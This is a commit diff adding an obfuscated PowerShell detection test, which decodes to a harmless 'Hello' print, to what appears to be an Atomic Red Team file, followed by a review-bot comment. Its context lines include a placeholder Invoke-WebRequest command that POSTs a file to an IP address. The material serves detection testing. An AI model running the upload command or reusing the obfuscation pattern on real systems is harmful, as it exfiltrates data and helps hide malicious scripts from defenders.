Update T1027.yaml

Added additional obfuscated PowerShell example.
This commit is contained in:
Adam Mashinchi
2021-07-26 12:46:41 -07:00
committed by GitHub
parent 4ab80721ac
commit 189ae94750
+12
@@ -150,3 +150,15 @@ atomic_tests:
command: |
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
name: powershell
- name: Obfuscated Command in PowerShell
auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
description: |
This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
supported_platforms:
- windows
executor:
command: |
$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
name: powershell
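Review bot: The `description:` block of the new test states what the command prints but not what it decodes to, which is what a detection engineer needs in order to confirm that a rule fires on the obfuscation technique rather than on the payload; the octal sequence on the `command: |` line decodes to `Write-Host 'Hello, from PowerShell!'`, so add a sentence such as `Deobfuscated, the command is: Write-Host 'Hello, from PowerShell!'` to the description. The Red Canary report is named but not linked; a reference URL in the description would let readers verify the sample. The command has no effect beyond console output, so the absence of a `cleanup_command` is fine, but saying so in the description avoids a reviewer asking. The enclosing `atomic_tests:` sequence begins outside the hunk.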